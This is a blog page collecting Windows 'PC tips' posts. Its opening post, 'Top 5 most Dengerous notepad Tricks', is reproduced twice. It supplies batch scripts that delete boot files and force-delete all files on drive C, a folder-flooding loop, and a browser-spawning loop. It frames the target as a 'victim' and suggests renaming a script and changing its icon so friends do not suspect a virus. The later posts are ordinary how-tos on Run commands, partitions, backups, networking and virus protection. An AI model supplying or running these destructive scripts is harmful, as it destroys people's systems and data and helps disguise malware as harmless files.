Showing posts with label PC tips. Show all posts
Showing posts with label PC tips. Show all posts

Top 5 most Dengerous notepad Tricks

0

Top 5 most Dengerous notepad Tricks

SOME DANGEROUS AND DEADLY  TRICKS
[CAUTION]
DO NOT TRY THESE FOR FUN!!

1. How to create more than 3,000 folders under a minute
1) Open your notepad and type
the following code.
@echo off
:top
md %random%

goto top
2) Save it as 1000.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to
your friends. So if you are
looking to fool your friends, then
change the file name and also
the icon so that he doesn’t
suspect the file to be a virus.
 ———————————————————————————
——————————————————–


2. How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU
WONT RECOVER BACK AFTER YOU
RUN IT !!!
This should shutdown the persons computer. It shuts it off once
and deletes the files needed to reboot and restart.So please, use
this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat.

———————————————————————————
——————————————————–
3. How to Delete all your system
files with a small command!
Copy the following code into your
notepad and save it as a .bat
file.
del *.*
All your files in your hard disk will
vanish in less than 5mins.
———————————————————————————
——————————————————–
4. RAM crashing trick
open notepad and type
:A
start http://computer-tricks-corner.blogspot.in/
goto A
save with .bat extension.
Infinitely loops your browser to
open up http://computer-tricks-corner.blogspot.in/
———————————————————————————
——————————————————–
5. Crash a Computer System With

Nothing But a Link.
This is a javascript “exploit” , it
will hang/crash your system. It
basically floods you with an
infinite loop of mailto:xxx
windows. To cancel this (and you
have to move fast) kill the
process of your email client
before you run out of RAM. Every
instance occupies about 1000
bytes, if your victim is smart, he
better end the process As soon as
possible or he will be forced to
reboot his computer.
WARNING THIS LINK WILL CRASH
YOUR BROWSER OR WORSE, YOUR
COMPUTER !!!!
Click Here
———————————————————————————
——————————————————–
NOTE: Try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY!

SOME DANGEROUS AND DEADLY  TRICKS
[CAUTION]
DO NOT TRY THESE FOR FUN!!

1. How to create more than 3,000 folders under a minute
1) Open your notepad and type
the following code.
@echo off
:top
md %random%

goto top
2) Save it as 1000.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to
your friends. So if you are
looking to fool your friends, then
change the file name and also
the icon so that he doesn’t
suspect the file to be a virus.
 ———————————————————————————
——————————————————–


2. How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU
WONT RECOVER BACK AFTER YOU
RUN IT !!!
This should shutdown the persons computer. It shuts it off once
and deletes the files needed to reboot and restart.So please, use
this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat.

———————————————————————————
——————————————————–
3. How to Delete all your system
files with a small command!
Copy the following code into your
notepad and save it as a .bat
file.
del *.*
All your files in your hard disk will
vanish in less than 5mins.
———————————————————————————
——————————————————–
4. RAM crashing trick
open notepad and type
:A
start http://computer-tricks-corner.blogspot.in/
goto A
save with .bat extension.
Infinitely loops your browser to
open up http://computer-tricks-corner.blogspot.in/
———————————————————————————
——————————————————–
5. Crash a Computer System With

Nothing But a Link.
This is a javascript “exploit” , it
will hang/crash your system. It
basically floods you with an
infinite loop of mailto:xxx
windows. To cancel this (and you
have to move fast) kill the
process of your email client
before you run out of RAM. Every
instance occupies about 1000
bytes, if your victim is smart, he
better end the process As soon as
possible or he will be forced to
reboot his computer.
WARNING THIS LINK WILL CRASH
YOUR BROWSER OR WORSE, YOUR
COMPUTER !!!!
Click Here
———————————————————————————
——————————————————–
NOTE: Try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY!

Create Your Own Run Command

0

Create Your Own Run Command

It is a simple and easy method of accessing programs quickly. If you happen to want to make a shortcut to an application your own way you can choose command method.

Let’s do it:

Step 1: Go to “Start,” “Run,”  and type regedit.

Step 2: Navigate to the following:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Apps Path

Step 3: Create a new folder/key under Apps Path. (Right-Click Apps Path and click “New,” “Key.”)

Step 4: Title the new folder/key the name of the application, e.g. firefox.exe.

Step 5: Right-Click the default string value (the thing automatically created in your new folder) and click Modify.
Step 6: Change the value to the path of the executable you are attempting to run. E.g. C:\Program Files\Mozilla Firefox\firefox.exe

Step 7: Done! Now, all you need to do is go to “Start,” “Run,” and type the name of your command.
Note: You can write only Exe name like above example we can write only firefox

Open Command Prompt From Any Folder

0

Open Command Prompt From Any Folder


Here is a quick time saver that I use all the time: Hold down the Shift key and right click on any folder in Windows 7 and select Open command window here. A command prompt will open with the current directory set automatically.


Add Additional Clocks To Taskbar

0

Add Additional Clocks To Taskbar

Ever want to keep track of the time in a different time zone.With Vista/7 you can now track two additional time zones with mini clocks that show up when you hover the mouse over the clock.

Add additional time zones:

1. Right click on the clock in the taskbar and select Adjust Date/Time.


2. Click on the Additional Clocks tab.

3. Check the box for either additional clock 1 or 2 and select the time zone.

4. Type in a display name for your click and hit OK.

Now when you hover your mouse over or click on the clock you will see the additional time zone
.

Calibrate Your Display

0

Calibrate Your Display

Window 7 includes a new feature to set color brightness contrast according to your settings for your specific display.
Just click on the start button and type DCCW





Then follow the on screen directions and adjust the sliders so that the test picture look like the “Good” sample picture. 

Follow Easyb @  +Agboola Isiaq 
Also use the comment Box below for more Tips/Tricks
0

Hard Drive Partition Create Error

In my previous Blog I was tell about hard drive partition but in hard drive partition mainly you have face problem.This problem appears message :

 "Dynamic disks are not supported by this operating system or server configuration".

 Dynamic disks are not supported on clusters.
when i try to create the "new simple volume" again i get the same messages. You can solve this problem only one step change in hard drive partition that is: 



In this screen shot you can see option "New Simple Volume" but in this you have got one more option that is "Delete Volume".Simply click on "Delete Volume" and you appears one more message simply click "yes".

After this you can repeat  hard drive partition steps then you have not face any problem.

Follow Easyb @  +Agboola Isiaq 
Also use the comment Box below for more Tips/Tricks

Hard Drive Partition Without Formatting

0

Hard Drive Partition Without Formatting

Disk partitioning divides a hard drive into several partitions. Partitions are usually created when the hard drive is first being prepared for usage. Once a hard drive is divided into partitions, because of later changes on the computer and Operating System, an administrator or power user will be faced with the needs to resize partition, move partition, split partition, merge partitions, create a new partition for Windows 7 dual boot system and so on. So how to partition a hard drive without formatting the hard drive is very important to manage partitions for different usage.Most of an operating systems are two partition (local disk c and Recovery d)


Procedure to Hard drive partition:


Step 1:  So i wanted to partition the drive C: , Right click on my computer and select Manage
.

Step 2: Then selected Disk Management.


Step 3: Then select Those drive that you want to partition for ex: I select Maninder drive and the right click on Maninder drive and then select Shirnk volume.


Step 4 :Then Free Space is allocated and the right click on Free space and then select New Simple Volume.



Step 5:The New Simple Volume Wizard is show and then you click next.

Step 6: Then You click Next,Next,Next and click finish.

Extend The Partiton


Step 1: Extend the partition

a. Open Computer Management by clicking the Start button, clicking Control Panel, clicking System and Security, clicking Administrative Tools, and then double-clicking Computer Management.‌ If you're prompted for an administrator password or confirmation, type the password or provide confirmation.

b. In the left pane, under Storage, click Disk Management.

c. Right click on C: partition and then choose to Extend

Follow Easyb @  +Agboola Isiaq 
Also use the comment Box below for more Tips/Tricks
.

Set password on text file, video, document, anything that you want to set

0

Set password on text file, video, document, anything that you want to set

Have you ever want to password protect your txt file or video file?  So i will show you how to do so
1- Create one folder on desktop called "ccrypt"
2- Download "cygwin1.dll" Download
3-Download ""ccrypt.exe" Download
then copy the two file to the "ccrypt" folder on desktop
4- Now i create a file called ms.txt in ccrypt folder
5- Start --> run --> cmd 
(1)- change to ccrypt folder on desktop
     (2)- encrypt thems.txt file, we use -e to encrypt
     (3)- it will prompt you to enter password, you have to remember it when you decrypt it. 
     then our file, ms.txt will change to ms.txt.cpt and the content also change 
5- To decrypt the file to make it readable we use, -d.
    When it prompt you to type the password, type the password that you use to encrypt. 
    now everything back to normal both file name and content.

Finish....
Follow Easyb @  +Agboola Isiaq +Agboola Isiaq  
Also use the comment Box below for more Tips/Tricks

4 Useful Tips For Digital File Backup

0

4 Useful Tips For Digital File Backup

Tips For Digital File Backup
In this age of increased technological dependence in everything from business, to educational and social environments, the need to compile and keep track of large amounts of electronic data is always increasing. Whether you’re a student downloading e-books, writing papers, and recording lectures on a laptop, a business employee managing company documents and coordinating digital communication, or simply a socially active Internet enthusiast, chances are your computer equipment is full to bursting with various types of documents. So, how do you manage it all?
Depending on the volume and significance of your files, storage and management might be simple. However, if you reach a point at which you require either a more secure method of storage and backup, or simply more space, you’ll need to explore new methods of file storage. Here are four to consider.

1. USB Storage
USB storage remains one of the simplest and most convenient means of storing excess files, either for the sake of accommodation or backup. USB storage devices are available in varying sizes, with some serving needs for just a few files, and others being able to backup enormous amounts of data. It’s always a good idea to have a USB on hand with backups of your most important files – the only danger is that it’s not too tough to lose the USB devices themselves!

2. Cloud Computing
Cloud computing is one of the hottest topics in technology, and is available from a range of providers, from massive tech companies, to niche providers like Sharefile. Cloud computing offers various benefits, but for backing up and storing excess data, it offers a very unique solution. Basically, you can digitally save any file you wish to your cloud, at which point it will be accessible from any device with Internet capability. Think of it as a USB drive that exists only in digital form.

3. External Hard Drive
If you want a more permanent, and more capable solution than a USB, an external hard drive can be a great idea. A strong enough hard drive can essentially hold as much data as your computer can on its own, meaning that you can either enjoy total backup, or store a massive range of extra files. For example, some use external hard drives for personal files, and computers for work or school files.

4. Email Backup
Finally, if you’d rather not purchase a means of digital backup, one simple, makeshift version of cloud storage remains available: email! If you only need backup occasionally, and your computer needs and uses are limited, you can simply email important files to yourself when necessary, ensuring that you can access them through email even if your computer fails you. This is not necessarily the most secure or convenient means of file backup or storage, but it does work for the occasional need.

Follow Easyb @  +Agboola Isiaq 
Also use the comment Box below for more Tips/Tricks

keyboard dancing led light trick

0

keyboard dancing led light trick


                 Today i will be showing you an interesting trick which will let your keyboard led light to dance. Basicly we will be creating a vbscript to make caps lock, num lock and scroll lock to perform this trick. So lets get started.

     How to do that ?
       1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
       
       2. Then save this file as led.vbs (.vbs is must)
       3. Open your save file and see your keyboard led blinking like disco lights.


     How to disable blinking Led ?
       1. First open Task Manager [ctrl+alt+del ]
       2. Then Go to process tab.
       3. Select wscript.exe 
       4. Click on End process

Why is My PC Crashing?

0

Why is My PC Crashing?


PC computer troubleshooting tips
Nothing can put a damper on productivity quite like a computer that crashes on a regular basis. Sometimes, a crash is preceded by the dreaded “blue screen of death” or another warning; other times, a computer simply shuts off without any warning at all. In either case, the end result is a whole lot of frustration, aggravation and lost work. If your computer has been crashing frequently, you’d probably like to put an end to it. Unfortunately, getting to the bottom of things if often easier said than done. The following tips about improving your computer’s performance, though, are excellent places to begin.

Possibility #1: Corrupted System Registry Files

Every Windows-based PC has something called a Windows registry. The registry contains several files that are integral to the performance and operation of your computer. Over time, some of those files can become corrupted, be misplaced or get lost altogether. When that happens, the system registry becomes compromised – and frequent crashes are all-too-common symptoms. The best way to rule this possibility in or out is by running a Windows registry cleaning program. Such programs scan your Windows registry for problems then automatically make repairs. If you run a registry cleaner and the crashes persist, they are probably being caused by a different issue.

Possibility #2: Disorganized Files

Windows operating systems handle file organization in a way that isn’t very intuitive. Basically, they break files up and fit them into gaps in the computer’s memory. As time goes by, these disorganized files can prompt frequent crashes. Luckily, a great optimization solution is built right into Windows-based PCs: the disk defragmentation utility. Although its location on a computer varies, you can generally locate it within the System and Security section inside the Control Panel. By running a defrag once every few months, you may be able to keep those pesky computer crashes at bay.

Possibility #3: Malicious Software

Malicious software can take many different forms. Sometimes, it’s a virus that is accidentally unleashed after opening a strange email; other times, its adware that tags along with other information that is automatically downloaded from a website. Whatever type it is, there’s no question that malicious software can wreak havoc on a computer’s performance. Happily, there are many topnotch programs out there that regularly scan your computer for the presence of such problems – and that help guard against them, too. Buy one, install it and use it regularly; your crash issues may come to an end.

Possibility #4: Too Little Available Memory

When you buy a new computer, it feels like there’s no end to the amount of memory that it has. Of course, this isn’t true at all. As never-ending as the available memory on your PC may initially seem, the fact is that it can be depleted with incredible speed. You can find out for sure by checking the information within “My Computer.” If it appears that your available memory is low, you can use a PC cleanup program to remove unnecessary files; such programs remove things like temporary Internet files and other file debris that can suck away much-needed memory.

Possibility #5: Overheating

If you’ve run through all of the preceding possibilities and continue experiencing frequent crashes, a hardware issue could be to blame. An easy one to rule out is overheating. A computer’s CPU, or central processing unit, includes a fan that is designed to keep it running cool. Sometimes, the fan wears down and doesn’t work as efficiently; other times, it’s just not able to handle the work that your computer has to do. In either case, buying a bigger, better fan isn’t very expensive. If it puts an end to your PC crashing problem, it will have been more than worth it.

Don’t Put Up with Frequent Crashes!

As discussed, frequent computer crashes can be triggered by a wide variety of issues. Luckily, many of these issues are relatively easy to remedy. Work your way through the preceding list; chances are, you’ll be able to pinpoint the problem and put an effective cure to work. Nine times out of ten, a computer simply needs a little bit of routine maintenance to get it back on track again. In the future, keep these points in mind. Any time you buy a new computer, keep up with its basic maintenance right from the get-go. By doing that, you could avoid “blue screen of death” and crashing problems altogether – and that’s something that you’re bound to appreciate!

Follow Easyb @  +Agboola Isiaq 
Also use the comment Box below for more Tips/Tricks

 

How to Set Up and Troubleshoot a Home Computer Network

0

How to Set Up and Troubleshoot a Home Computer Network

Computer Networking Tips
Setting up a home computer network may sound daunting, but it’s relatively simple, provided you break everything down into specific steps. Home computer networks are ideal for sharing a wireless connection among multiple computers, especially for those who have a home office, teenagers, or another computer configuration.

 

 

 

Purchasing a Router

Before you begin to worry about software, worry about hardware. A excellent router, like a Cisco router or a Linksys router, will save you from having to endlessly reboot and reprogram while still allowing you to quickly set up a home network. Make sure you buy from a company that has years of experience designing high quality routers that are capable of handling high amounts of traffic (such as data heavy media files). Virtually any home network will run smoothly without irritating slowness or delays.

Wireless Bandwidth

After you’ve purchased a router, the next step is to determine how much bandwidth you are receiving from your wireless connection. This becomes particularly important if you have a household where the network users are habitually downloading movies or other large data files. While a router can rapidly transfer this information, it is constrained by the amount of bandwidth available to the household. A connection that transmits data at 2.4 GHz with a 54 megabit speed is usually adequate to the task. 
If your network feels exceptionally sluggish, check to make sure that you are receiving the wireless by ‘pinging’ the network. Alternatively, if you are receiving the full wireless bandwidth but are still experiencing slow results because of the types of media you are transferring, you may consider paying for a faster service. 

Software Drivers

While software drivers for networking are fairly easy to find and download from the Internet, purchasing software directly from a computer retailer is recommended as a way to keep your network free of faulty software. A higher incidence of spyware and viruses makes downloading free software inadvisable, especially for something as sensitive as a computer network. 
Purchasing software from one of the major companies, such as McAfee or Symantec, will also provide you with another vital component of wireless home networking: a firewall. Because wireless networks are difficult to secure, the best option is to buy software that not only allows you to network, but is built specifically to keep out uninvited users. Firewalls are designed to protect your valuable information behind a tightly secured ‘wall’ which can’t be accessed unless a very specific encrypted code is used. 

Basic Set-Up

Now that you have all the components, you’ll want to set up the router first. Install the software driver onto each computer that will use the network. Set up a passkey that is fairly hard to break. Avoid simple or obvious terms that an outside user could easily guess. Set up each computer with this information. 
The company that is providing your wireless connection will usually assign you a name and a passkey. However, in some configurations, you will be able to reprogram this information.

Troubleshooting

No matter how expertly a system is set up, on occasion a technical problem manifests, resulting in a lack of connectivity for computers. There are a few ways to quickly check what’s working and what’s not. 
Usually, problems are caused by one of two things: the software on the computer itself is malfunctioning, and not allowing the computer to connect. You can test this by seeing if any other computers can connect to the network. If they can, the problem is local to that computer. A simple reboot of the software should solve this problem. However, if the software continues to be unable to connect to the internet, you will need to uninstall the software, and then reinstall it. Sometimes, a version can become corrupted. By wiping it clean and starting anew, the problem should resolve itself.
The second most common problem is that the router needs a quick reboot. If you purchase a quality router, you will not have this problem very often, although every now and again even the best routers need a quick reboot. Turn the router off for at least thirty seconds. Switch it back on, and check your connectivity in about ten minutes. This gives the system plenty of time to reset itself. 
If this doesn’t work, the wireless provider may temporarily be out. Call your wireless provider to determine if they are experiencing an outage, and when you can expect the resumption of service. If all of these methods don’t resolve your problem, there is a basic flaw in your initial setup.
Follow Easyb @  +Agboola Isiaq 
Also use the comment Box below for more Tips/Tricks

How to Protect Your Computer From Viruses

0


How to Protect Your Computer From Viruses

With millions of computer users browsing the web at any given time, there are plenty of targets for malicious coders. While computer experts don’t always know why coders choose to build harmful computer programs, the fact is that it happens all the time. Computer viruses can steal personal information, interfere with normal operations, attract spam and even shut down your computer’s hard drive. Protecting your computer is critical for browsing success.

Start With the Basics

Most computer systems come with security features already in place. For example, the Windows operating system is packaged with Microsoft Windows Security Center. When you first open, boot up and register a new computer, you should make sure that this program is functioning. It will give basic protection against spyware, viruses and malware. In addition, a basic firewall is built into this program, providing additional protection and stops for potentially harmful programs. Upon activation, don’t be surprised if your security system needs immediate updating. Software that protects your computer needs regular and consistent updating to stay useful. Viruses are constantly being generated and the several-month lag between when your computer was made and when you first started using it can mean that the database the security system is loaded with is severely out-of-date. 

Upgrade to Meet Your Needs

Many people operate computers for a long time with only basic protection in place. However, heavy computer users or those who have risky browsing habits can sometimes benefit from upgrading their virus, spyware and malware protection, as well as using a fuller-featured firewall; this is especially important if you use a networked computer system. Basic or free virus protection will still scan and update for viruses. Paid programs, however, offer more features, including ease-of-use and convenience features. The most important thing is to verify the publisher and make sure you are getting what is promised. Most well-known virus protection programs, such as AVG and Norton Security, have reviews available to help you make your choice.

Learn About Spyware Risks

Spyware creates risks that many computer users are not aware of. If you are only protecting against viruses, you could be leaving your computer open to damage. Most people are familiar with spyware that initiates and attracts annoying ad programs. Spyware, however, can be much more malicious as well. Your shopping habits can be tracked by spyware. While not exactly harmful, some people consider this a breach of privacy. The worst spyware programs interfere with normal operations and can even track what you type, sending personal information to people who want to steal your identity. Some spyware redirects your browser to different web addresses, increasing your risks of virus infection and fraud.

How Viruses Work

The main difference between spyware and viruses is how they are spread. A virus reproduces itself and attaches to any document that the computer sends, while spyware can be stored as a cookie or tracking code. A virus is most often found traveling with a piece of computer software, such as a document, picture or piece of music. When dealing with email, it is necessary to open an attachment to become infected, indicating that, in most cases, the computer user must somehow invite the malicious software to replicate on their system. Of course, most people have no idea it is there or what is happening. Some of the sneakiest and most harmful viruses actually masquerade as virus protection software, making them extremely hard to detect. Because of this, it’s crucial to be familiar with your particular virus protection program and know what it looks like and what the normal scripts and prompts are during operation. Viruses do some of the same things that spyware does; they just accomplish it differently. An active virus can steal personal information, generate ads or shut down your system, including the very virus protection programs that can fix the issue.

Take Steps For Protection

Like anything, the best way to protect against viruses is to be educated. Become familiar with what malicious software may look like. If you get an email or are asked to download a file that you don’t recognize or looks suspicious, do your homework. Research virus protection, spyware, malware and firewall programs and use them to their fullest capacity. Set the software to update and scan automatically to make sure that the system is constantly monitored. In addition, regularly check on the databases published by various virus protection services; many will provide lists of symptoms and risks, as well as the standard way the file gains access for no cost to the public.

Follow Easyb @  +Agboola Isiaq  
Also use the comment Box below for more Tips/Tricks